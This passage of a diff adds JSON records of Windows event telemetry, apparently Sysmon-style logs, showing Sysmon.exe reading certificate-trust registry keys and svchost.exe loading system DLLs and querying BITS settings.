"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883570901840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "twinapi.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 